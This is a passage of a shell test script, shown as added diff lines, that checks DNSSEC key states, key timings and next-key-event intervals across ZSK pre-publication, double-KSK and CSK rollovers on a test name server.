"SYNCPUBLISH" "${created}" 43800 + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the zone signatures become OMNIPRESENT: max-zone-ttl +# plus zone propagation delay plus retire safety minus the already elapsed +# 900 seconds: 12h + 300s + 20m - 900 = 44700 - 900 = 43800 seconds +check_next_key_event 43800 + +# +# Zone: step3.enable-dnssec.autosign. +# +set_zone "step3.enable-dnssec.autosign" +set_policy "enable-dnssec" "1" "300" +set_server "ns3" "10.53.0.3" +# All signatures should be omnipresent, so the DS can be submitted. +set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "rumoured" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The key was published and activated 44700 seconds ago (with settime). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -44700 +set_addkeytime "KEY1" "ACTIVE" "${created}" -44700 +set_keytime "KEY1" "SYNCPUBLISH" "${created}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify +# Check that CDS publication is logged. +check_cdslog "$DIR" "$ZONE" KEY1 + +# The DS can be introduced. We ignore any parent registration delay, so set +# the DS publish time to now. +rndc_checkds "$SERVER" "$DIR" KEY1 "now" "published" "$ZONE" +# Next key event is when the DS can move to the OMNIPRESENT state. This occurs +# when the parent propagation delay have passed, plus the DS TTL and retire +# safety delay: 1h + 2h + 20m = 3h20m = 12000 seconds +check_next_key_event 12000 + +# +# Zone: step4.enable-dnssec.autosign. +# +set_zone "step4.enable-dnssec.autosign" +set_policy "enable-dnssec" "1" "300" +set_server "ns3" "10.53.0.3" +# The DS is omnipresent. +set_keystate "KEY1" "STATE_DS" "omnipresent" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The key was published and activated 56700 seconds ago (with settime). +created=$(key_get KEY1 CREATED) +set_addkeytime "KEY1" "PUBLISHED" "${created}" -56700 +set_addkeytime "KEY1" "ACTIVE" "${created}" -56700 +set_addkeytime "KEY1" "SYNCPUBLISH" "${created}" -12000 + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is never, the zone dnssec-policy has been established. So we +# fall back to the default loadkeys interval. +check_next_key_event 3600 + +# +# Testing ZSK Pre-Publication rollover. +# + +# Policy parameters. +# Lksk: 2 years (63072000 seconds) +# Lzsk: 30 days (2592000 seconds) +# Iret(KSK): DS TTL (1d) + DprpP (1h) + retire-safety (2d) +# Iret(KSK): 3d1h (262800 seconds) +# Iret(ZSK): RRSIG TTL (1d) + Dprp (1h) + Dsgn (1w) + retire-safety (2d) +# Iret(ZSK): 10d1h (867600 seconds) +Lksk=63072000 +Lzsk=2592000 +IretKSK=262800 +IretZSK=867600 + +# +# Zone: step1.zsk-prepub.autosign. +# +set_zone "step1.zsk-prepub.autosign" +set_policy "zsk-prepub" "2" "3600" +set_server "ns3" "10.53.0.3" + +set_retired_removed() { + _Lkey=$2 + _Iret=$3 + + _active=$(key_get $1 ACTIVE) + set_addkeytime "${1}" "RETIRED" "${_active}" "${_Lkey}" + _retired=$(key_get $1 RETIRED) + set_addkeytime "${1}" "REMOVED" "${_retired}" "${_Iret}" +} + +rollover_predecessor_keytimes() { + _addtime=$1 + + _created=$(key_get KEY1 CREATED) + set_addkeytime "KEY1" "PUBLISHED" "${_created}" "${_addtime}" + set_addkeytime "KEY1" "SYNCPUBLISH" "${_created}" "${_addtime}" + set_addkeytime "KEY1" "ACTIVE" "${_created}" "${_addtime}" + [ "$Lksk" = 0 ] || set_retired_removed "KEY1" "${Lksk}" "${IretKSK}" + + _created=$(key_get KEY2 CREATED) + set_addkeytime "KEY2" "PUBLISHED" "${_created}" "${_addtime}" + set_addkeytime "KEY2" "ACTIVE" "${_created}" "${_addtime}" + [ "$Lzsk" = 0 ] || set_retired_removed "KEY2" "${Lzsk}" "${IretZSK}" +} + +# Key properties. +key_clear "KEY1" +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "${Lksk}" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +key_clear "KEY2" +set_keyrole "KEY2" "zsk" +set_keylifetime "KEY2" "${Lzsk}" +set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY2" "no" +set_zonesigning "KEY2" "yes" +# Both KSK (KEY1) and ZSK (KEY2) start in OMNIPRESENT. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" + +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" +# Initially only two keys. +key_clear "KEY3" +key_clear "KEY4" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# These keys are immediately published and activated. +rollover_predecessor_keytimes 0 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the successor ZSK needs to be published. That is +# the ZSK lifetime - prepublication time. The prepublication time is DNSKEY +# TTL plus publish safety plus the zone propagation delay. For the +# zsk-prepub policy that means: 30d - 3600s + 1d + 1h = 2498400 seconds. +check_next_key_event 2498400 + +# +# Zone: step2.zsk-prepub.autosign. +# +set_zone "step2.zsk-prepub.autosign" +set_policy "zsk-prepub" "3" "3600" +set_server "ns3" "10.53.0.3" +# New ZSK (KEY3) is prepublished, but not yet signing. +key_clear "KEY3" +set_keyrole "KEY3" "zsk" +set_keylifetime "KEY3" "${Lzsk}" +set_keyalgorithm "KEY3" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY3" "no" +set_zonesigning "KEY3" "no" +# Key states. +set_keystate "KEY2" "GOAL" "hidden" +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_ZRRSIG" "hidden" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated 694 hours ago (2498400 seconds). +rollover_predecessor_keytimes -2498400 +# - The new ZSK is published now. +created=$(key_get KEY3 CREATED) +set_keytime "KEY3" "PUBLISHED" "${created}" +# - The new ZSK becomes active when the DNSKEY is OMNIPRESENT. +# Ipub: TTLkey (1h) + Dprp (1h) + publish-safety (1d) +# Ipub: 26 hour (93600 seconds). +IpubZSK=93600 +set_addkeytime "KEY3" "ACTIVE" "${created}" "${IpubZSK}" +set_retired_removed "KEY3" "${Lzsk}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the successor ZSK becomes OMNIPRESENT. That is the +# DNSKEY TTL plus the zone propagation delay, plus the publish-safety. For +# the zsk-prepub policy, this means: 3600s + 1h + 1d = 93600 seconds. +check_next_key_event 93600 + +# +# Zone: step3.zsk-prepub.autosign. +# +set_zone "step3.zsk-prepub.autosign" +set_policy "zsk-prepub" "3" "3600" +set_server "ns3" "10.53.0.3" +# ZSK (KEY2) no longer is actively signing, RRSIG state in UNRETENTIVE. +# New ZSK (KEY3) is now actively signing, RRSIG state in RUMOURED. +set_zonesigning "KEY2" "no" +set_keystate "KEY2" "STATE_ZRRSIG" "unretentive" +set_zonesigning "KEY3" "yes" +set_keystate "KEY3" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY3" "STATE_ZRRSIG" "rumoured" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys are activated 30 days ago (2592000 seconds). +rollover_predecessor_keytimes -2592000 +# - The new ZSK is published 26 hours ago (93600 seconds). +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -93600 +set_keytime "KEY3" "ACTIVE" "${created}" +set_retired_removed "KEY3" "${Lzsk}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +# Subdomain still has good signatures of ZSK (KEY2). +# Set expected zone signing on for KEY2 and off for KEY3, +# testing whether signatures which are still valid are being reused. +set_zonesigning "KEY2" "yes" +set_zonesigning "KEY3" "no" +check_subdomain +# Restore the expected zone signing properties. +set_zonesigning "KEY2" "no" +set_zonesigning "KEY3" "yes" +dnssec_verify + +# Next key event is when all the RRSIG records have been replaced with +# signatures of the new ZSK, in other words when ZRRSIG becomes OMNIPRESENT. +# That is Dsgn plus the maximum zone TTL plus the zone propagation delay plus +# retire-safety. For the zsk-prepub policy that means: 1w (because 2w validity +# and refresh within a week) + 1d + 1h + 2d = 10d1h = 867600 seconds. +check_next_key_event 867600 + +# +# Zone: step4.zsk-prepub.autosign. +# +set_zone "step4.zsk-prepub.autosign" +set_policy "zsk-prepub" "3" "3600" +set_server "ns3" "10.53.0.3" +# ZSK (KEY2) DNSKEY is no longer needed. +# ZSK (KEY3) is now actively signing, RRSIG state in RUMOURED. +set_keystate "KEY2" "STATE_DNSKEY" "unretentive" +set_keystate "KEY2" "STATE_ZRRSIG" "hidden" +set_keystate "KEY3" "STATE_ZRRSIG" "omnipresent" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys are activated 961 hours ago (3459600 seconds). +rollover_predecessor_keytimes -3459600 +# - The new ZSK is published 267 hours ago (961200 seconds). +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -961200 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "ACTIVE" "${published}" "${IpubZSK}" +set_retired_removed "KEY3" "${Lzsk}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the DNSKEY enters the HIDDEN state. This is the +# DNSKEY TTL plus zone propagation delay. For the zsk-prepub policy this is: +# 3600s + 1h = 7200s +check_next_key_event 7200 + +# +# Zone: step5.zsk-prepub.autosign. +# +set_zone "step5.zsk-prepub.autosign" +set_policy "zsk-prepub" "3" "3600" +set_server "ns3" "10.53.0.3" +# ZSK (KEY2) DNSKEY is now completely HIDDEN and removed. +set_keystate "KEY2" "STATE_DNSKEY" "hidden" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys are activated 962 hours ago (3463200 seconds). +rollover_predecessor_keytimes -3463200 +# - The new ZSK is published 268 hours ago (964800 seconds). +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -964800 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "ACTIVE" "${published}" "${IpubZSK}" +set_retired_removed "KEY3" "${Lzsk}" "${IretZSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the new successor needs to be published. This is the +# ZSK lifetime minus Iret minus Ipub minus DNSKEY TTL. For the zsk-prepub +# policy this is: 30d - 867600s - 93600s - 3600s = 1627200 seconds. +check_next_key_event 1627200 + +# +# Zone: step6.zsk-prepub.autosign. +# +set_zone "step6.zsk-prepub.autosign" +set_policy "zsk-prepub" "2" "3600" +set_server "ns3" "10.53.0.3" +# ZSK (KEY2) DNSKEY is purged. +key_clear "KEY2" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# +# Testing KSK Double-KSK rollover. +# + +# Policy parameters. +# Lksk: 60 days (16070400 seconds) +# Lzsk: 1 year (31536000 seconds) +# Iret(KSK): DS TTL (1h) + DprpP (1h) + retire-safety (2d) +# Iret(KSK): 50h (180000 seconds) +# Iret(ZSK): RRSIG TTL (1d) + Dprp (1h) + Dsgn (1w) + retire-safety (2d) +# Iret(ZSK): 10d1h (867600 seconds) +Lksk=5184000 +Lzsk=31536000 +IretKSK=180000 +IretZSK=867600 + +# +# Zone: step1.ksk-doubleksk.autosign. +# +set_zone "step1.ksk-doubleksk.autosign" +set_policy "ksk-doubleksk" "2" "7200" +set_server "ns3" "10.53.0.3" +# Key properties. +key_clear "KEY1" +set_keyrole "KEY1" "ksk" +set_keylifetime "KEY1" "${Lksk}" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "no" + +key_clear "KEY2" +set_keyrole "KEY2" "zsk" +set_keylifetime "KEY2" "${Lzsk}" +set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY2" "no" +set_zonesigning "KEY2" "yes" +# Both KSK (KEY1) and ZSK (KEY2) start in OMNIPRESENT. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" + +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent" +# Initially only two keys. +key_clear "KEY3" +key_clear "KEY4" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# These keys are immediately published and activated. +rollover_predecessor_keytimes 0 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the successor KSK needs to be published. That is +# the KSK lifetime - prepublication time. The prepublication time is +# DNSKEY TTL plus publish safety plus the zone propagation delay. +# For the ksk-doubleksk policy that means: 60d - (1d3h) = 5086800 seconds. +check_next_key_event 5086800 + +# +# Zone: step2.ksk-doubleksk.autosign. +# +set_zone "step2.ksk-doubleksk.autosign" +set_policy "ksk-doubleksk" "3" "7200" +set_server "ns3" "10.53.0.3" +# New KSK (KEY3) is prepublished (and signs DNSKEY RRset). +key_clear "KEY3" +set_keyrole "KEY3" "ksk" +set_keylifetime "KEY3" "${Lksk}" +set_keyalgorithm "KEY3" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY3" "yes" +set_zonesigning "KEY3" "no" +# Key states. +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY3" "GOAL" "omnipresent" +set_keystate "KEY3" "STATE_DNSKEY" "rumoured" +set_keystate "KEY3" "STATE_KRRSIG" "rumoured" +set_keystate "KEY3" "STATE_DS" "hidden" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated 1413 hours ago (5086800 seconds). +rollover_predecessor_keytimes -5086800 +# - The new KSK is published now. +created=$(key_get KEY3 CREATED) +set_keytime "KEY3" "PUBLISHED" "${created}" +# The new KSK should publish the CDS after the prepublication time. +# TTLkey: 2h +# DprpC: 1h +# publish-safety: 1d +# IpubC: 27h (97200 seconds) +IpubC=97200 +set_addkeytime "KEY3" "SYNCPUBLISH" "${created}" "${IpubC}" +set_addkeytime "KEY3" "ACTIVE" "${created}" "${IpubC}" +set_retired_removed "KEY3" "${Lksk}" "${IretKSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the successor KSK becomes OMNIPRESENT. That is the +# DNSKEY TTL plus the zone propagation delay, plus the publish-safety. For +# the ksk-doubleksk policy, this means: 7200s + 1h + 1d = 97200 seconds. +check_next_key_event 97200 + +# +# Zone: step3.ksk-doubleksk.autosign. +# +set_zone "step3.ksk-doubleksk.autosign" +set_policy "ksk-doubleksk" "3" "7200" +set_server "ns3" "10.53.0.3" + +# The DNSKEY RRset has become omnipresent. +# Check keys before we tell named that we saw the DS has been replaced. +set_keystate "KEY3" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY3" "STATE_KRRSIG" "omnipresent" +# The old DS (KEY1) can be withdrawn and the new DS (KEY3) can be introduced. +set_keystate "KEY1" "STATE_DS" "unretentive" +set_keystate "KEY3" "STATE_DS" "rumoured" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# Check that CDS publication is logged. +check_cdslog "$DIR" "$ZONE" KEY3 + +# Set expected key times: +# - The old keys were activated 60 days ago (5184000 seconds). +rollover_predecessor_keytimes -5184000 +# - The new KSK is published 27 hours ago (97200 seconds). +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -97200 +# - The new KSK CDS is published now. +set_keytime "KEY3" "SYNCPUBLISH" "${created}" +syncpub=$(key_get KEY3 SYNCPUBLISH) +set_keytime "KEY3" "ACTIVE" "${syncpub}" +set_retired_removed "KEY3" "${Lksk}" "${IretKSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# We ignore any parent registration delay, so set the DS publish time to now. +rndc_checkds "$SERVER" "$DIR" KEY1 "now" "withdrawn" "$ZONE" +rndc_checkds "$SERVER" "$DIR" KEY3 "now" "published" "$ZONE" +# Next key event is when the predecessor DS has been replaced with the +# successor DS and enough time has passed such that the all validators that +# have this DS RRset cached only know about the successor DS. This is the +# the retire interval, which is the parent propagation delay plus the DS TTL +# plus the retire-safety. For the ksk-double-ksk policy this means: +# 1h + 3600s + 2d = 2d2h = 180000 seconds. +check_next_key_event 180000 + +# +# Zone: step4.ksk-doubleksk.autosign. +# +set_zone "step4.ksk-doubleksk.autosign" +set_policy "ksk-doubleksk" "3" "7200" +set_server "ns3" "10.53.0.3" +# KSK (KEY1) DNSKEY can be removed. +set_keysigning "KEY1" "no" +set_keystate "KEY1" "STATE_DNSKEY" "unretentive" +set_keystate "KEY1" "STATE_KRRSIG" "unretentive" +set_keystate "KEY1" "STATE_DS" "hidden" +# New KSK (KEY3) DS is now OMNIPRESENT. +set_keystate "KEY3" "STATE_DS" "omnipresent" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old keys were activated 1490 hours ago (5364000 seconds). +rollover_predecessor_keytimes -5364000 +# - The new KSK is published 77 hours ago (277200 seconds). +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -277200 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" "${IpubC}" +syncpub=$(key_get KEY3 SYNCPUBLISH) +set_keytime "KEY3" "ACTIVE" "${syncpub}" +set_retired_removed "KEY3" "${Lksk}" "${IretKSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the DNSKEY enters the HIDDEN state. This is the +# DNSKEY TTL plus zone propagation delay. For the ksk-doubleksk policy this is: +# 7200s + 1h = 10800s +check_next_key_event 10800 + +# +# Zone: step5.ksk-doubleksk.autosign. +# +set_zone "step5.ksk-doubleksk.autosign" +set_policy "ksk-doubleksk" "3" "7200" +set_server "ns3" "10.53.0.3" +# KSK (KEY1) DNSKEY is now HIDDEN. +set_keystate "KEY1" "STATE_DNSKEY" "hidden" +set_keystate "KEY1" "STATE_KRRSIG" "hidden" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - The old KSK is activated 1492 hours ago (5371200 seconds). +rollover_predecessor_keytimes -5371200 +# - The new KSK is published 79 hours ago (284400 seconds). +created=$(key_get KEY3 CREATED) +set_addkeytime "KEY3" "PUBLISHED" "${created}" -284400 +published=$(key_get KEY3 PUBLISHED) +set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" "${IpubC}" +syncpub=$(key_get KEY3 SYNCPUBLISH) +set_keytime "KEY3" "ACTIVE" "${syncpub}" +set_retired_removed "KEY3" "${Lksk}" "${IretKSK}" + +# Various signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the new successor needs to be published. This is the +# KSK lifetime minus Ipub minus Iret minus DNSKEY TTL. For the +# ksk-doubleksk this is: 60d - 1d3h - 1d - 2d2h - 2h = +# 5184000 - 97200 - 180000 - 7200 = 4813200 seconds. +check_next_key_event 4899600 + +# +# Zone: step6.ksk-doubleksk.autosign. +# +set_zone "step6.ksk-doubleksk.autosign" +set_policy "ksk-doubleksk" "2" "7200" +set_server "ns3" "10.53.0.3" +# KSK (KEY1) DNSKEY is purged. +key_clear "KEY1" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +check_apex +check_subdomain +dnssec_verify + +# +# Testing CSK key rollover (1). +# + +# Policy parameters. +# Lcsk: 186 days (5184000 seconds) +# Iret(KSK): DS TTL (1h) + DprpP (1h) + retire-safety (2h) +# Iret(KSK): 4h (14400 seconds) +# Iret(ZSK): RRSIG TTL (1d) + Dprp (1h) + Dsgn (25d) + retire-safety (2h) +# Iret(ZSK): 26d3h (2257200 seconds) +Lcsk=16070400 +IretKSK=14400 +IretZSK=2257200 +IretCSK=$IretZSK + +csk_rollover_predecessor_keytimes() { + _addtime=$1 + + _created=$(key_get KEY1 CREATED) + set_addkeytime "KEY1" "PUBLISHED" "${_created}" "${_addtime}" + set_addkeytime "KEY1" "SYNCPUBLISH" "${_created}" "${_addtime}" + set_addkeytime "KEY1" "ACTIVE" "${_created}" "${_addtime}" + [ "$Lcsk" = 0 ] || set_retired_removed "KEY1" "${Lcsk}" "${IretCSK}" +} + +# +# Zone: step1.csk-roll.autosign. +# +set_zone "step1.csk-roll.autosign" +set_policy "csk-roll" "1" "3600" +set_server "ns3" "10.53.0.3" +# Key properties. +key_clear "KEY1" +set_keyrole "KEY1" "csk" +set_keylifetime "KEY1" "${Lcsk}" +set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY1" "yes" +set_zonesigning "KEY1" "yes" +# The CSK (KEY1) starts in OMNIPRESENT. +set_keystate "KEY1" "GOAL" "omnipresent" +set_keystate "KEY1" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY1" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent" +set_keystate "KEY1" "STATE_DS" "omnipresent" +# Initially only one key. +key_clear "KEY2" +key_clear "KEY3" +key_clear "KEY4" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# This key is immediately published and activated. +csk_rollover_predecessor_keytimes 0 +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the successor CSK needs to be published. +# This is Lcsk - Ipub - Dreg. +# Lcsk: 186d (16070400 seconds) +# Ipub: 3h (10800 seconds) +check_next_key_event 16059600 + +# +# Zone: step2.csk-roll.autosign. +# +set_zone "step2.csk-roll.autosign" +set_policy "csk-roll" "2" "3600" +set_server "ns3" "10.53.0.3" +# New CSK (KEY2) is prepublished (signs DNSKEY RRset, but not yet other RRsets). +key_clear "KEY2" +set_keyrole "KEY2" "csk" +set_keylifetime "KEY2" "16070400" +set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS" +set_keysigning "KEY2" "yes" +set_zonesigning "KEY2" "no" +# Key states. +set_keystate "KEY1" "GOAL" "hidden" +set_keystate "KEY2" "GOAL" "omnipresent" +set_keystate "KEY2" "STATE_DNSKEY" "rumoured" +set_keystate "KEY2" "STATE_KRRSIG" "rumoured" +set_keystate "KEY2" "STATE_ZRRSIG" "hidden" +set_keystate "KEY2" "STATE_DS" "hidden" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - This key was activated 4461 hours ago (16059600 seconds). +csk_rollover_predecessor_keytimes -16059600 +# - The new CSK is published now. +created=$(key_get KEY2 CREATED) +set_keytime "KEY2" "PUBLISHED" "${created}" +# - The new CSK should publish the CDS after the prepublication time. +# Ipub: 3 hour (10800 seconds) +Ipub="10800" +set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" "${Ipub}" +set_addkeytime "KEY2" "ACTIVE" "${created}" "${Ipub}" +set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the successor CSK becomes OMNIPRESENT. That is the +# DNSKEY TTL plus the zone propagation delay, plus the publish-safety. For +# the csk-roll policy, this means 3 hours = 10800 seconds. +check_next_key_event 10800 + +# +# Zone: step3.csk-roll.autosign. +# +set_zone "step3.csk-roll.autosign" +set_policy "csk-roll" "2" "3600" +set_server "ns3" "10.53.0.3" +# Swap zone signing role. +set_zonesigning "KEY1" "no" +set_zonesigning "KEY2" "yes" +# CSK (KEY1) will be removed, so moving to UNRETENTIVE. +set_keystate "KEY1" "STATE_ZRRSIG" "unretentive" +# New CSK (KEY2) DNSKEY is OMNIPRESENT, so moving ZRRSIG to RUMOURED. +set_keystate "KEY2" "STATE_DNSKEY" "omnipresent" +set_keystate "KEY2" "STATE_KRRSIG" "omnipresent" +set_keystate "KEY2" "STATE_ZRRSIG" "rumoured" +# The old DS (KEY1) can be withdrawn and the new DS (KEY2) can be introduced. +set_keystate "KEY1" "STATE_DS" "unretentive" +set_keystate "KEY2" "STATE_DS" "rumoured" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" +# Check that CDS publication is logged. +check_cdslog "$DIR" "$ZONE" KEY2 + +# Set expected key times: +# - This key was activated 186 days ago (16070400 seconds). +csk_rollover_predecessor_keytimes -16070400 +# - The new CSK is published three hours ago, CDS must be published now. +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "PUBLISHED" "${created}" "-${Ipub}" +set_keytime "KEY2" "SYNCPUBLISH" "${created}" +# - Also signatures are being introduced now. +set_keytime "KEY2" "ACTIVE" "${created}" +set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +# Subdomain still has good signatures of old CSK (KEY1). +# Set expected zone signing on for KEY1 and off for KEY2, +# testing whether signatures which are still valid are being reused. +set_zonesigning "KEY1" "yes" +set_zonesigning "KEY2" "no" +check_subdomain +# Restore the expected zone signing properties. +set_zonesigning "KEY1" "no" +set_zonesigning "KEY2" "yes" +dnssec_verify + +# We ignore any parent registration delay, so set the DS publish time to now. +rndc_checkds "$SERVER" "$DIR" KEY1 "now" "withdrawn" "$ZONE" +rndc_checkds "$SERVER" "$DIR" KEY2 "now" "published" "$ZONE" +# Next key event is when the predecessor DS has been replaced with the +# successor DS and enough time has passed such that the all validators that +# have this DS RRset cached only know about the successor DS. This is the +# the retire interval, which is the parent propagation delay plus the DS TTL +# plus the retire-safety. For the csk-roll policy this means: +# 1h + 1h + 2h = 4h = 14400 seconds. +check_next_key_event 14400 + +# +# Zone: step4.csk-roll.autosign. +# +set_zone "step4.csk-roll.autosign" +set_policy "csk-roll" "2" "3600" +set_server "ns3" "10.53.0.3" +# The old CSK (KEY1) is no longer signing the DNSKEY RRset. +set_keysigning "KEY1" "no" +# The old CSK (KEY1) DS is hidden. We still need to keep the DNSKEY public +# but can remove the KRRSIG records. +set_keystate "KEY1" "STATE_KRRSIG" "unretentive" +set_keystate "KEY1" "STATE_DS" "hidden" +# The new CSK (KEY2) DS is now OMNIPRESENT. +set_keystate "KEY2" "STATE_DS" "omnipresent" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - This key was activated 4468 hours ago (16084800 seconds). +csk_rollover_predecessor_keytimes -16084800 +# - The new CSK started signing 4h ago (14400 seconds). +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "ACTIVE" "${created}" -14400 +set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" -14400 +syncpub=$(key_get KEY2 SYNCPUBLISH) +set_addkeytime "KEY2" "PUBLISHED" "${syncpub}" "-${Ipub}" +set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}" + +# Continue signing policy checks. +check_keytimes +check_apex +check_subdomain +dnssec_verify + +# Next key event is when the KRRSIG enters the HIDDEN state. This is the +# DNSKEY TTL plus zone propagation delay. For the csk-roll policy this is: +# 1h + 1h = 7200 seconds. +check_next_key_event 7200 + +# +# Zone: step5.csk-roll.autosign. +# +set_zone "step5.csk-roll.autosign" +set_policy "csk-roll" "2" "3600" +set_server "ns3" "10.53.0.3" +# The old CSK (KEY1) KRRSIG records are now all hidden. +set_keystate "KEY1" "STATE_KRRSIG" "hidden" + +# Various signing policy checks. +check_keys +check_dnssecstatus "$SERVER" "$POLICY" "$ZONE" + +# Set expected key times: +# - This key was activated 4470 hours ago (16092000 seconds). +csk_rollover_predecessor_keytimes -16092000 +# - The new CSK started signing 6h ago (21600 seconds). +created=$(key_get KEY2 CREATED) +set_addkeytime "KEY2" "ACTIVE" "${created}" -21600 +set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" -21600 +syncpub=$(key_get KEY2 SYNCPUBLISH) +set_addkeytime "KEY2" "PUBLISHED" "${syncpub}" "-${Ipub}" +set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}" + +# Continue signing policy checks. 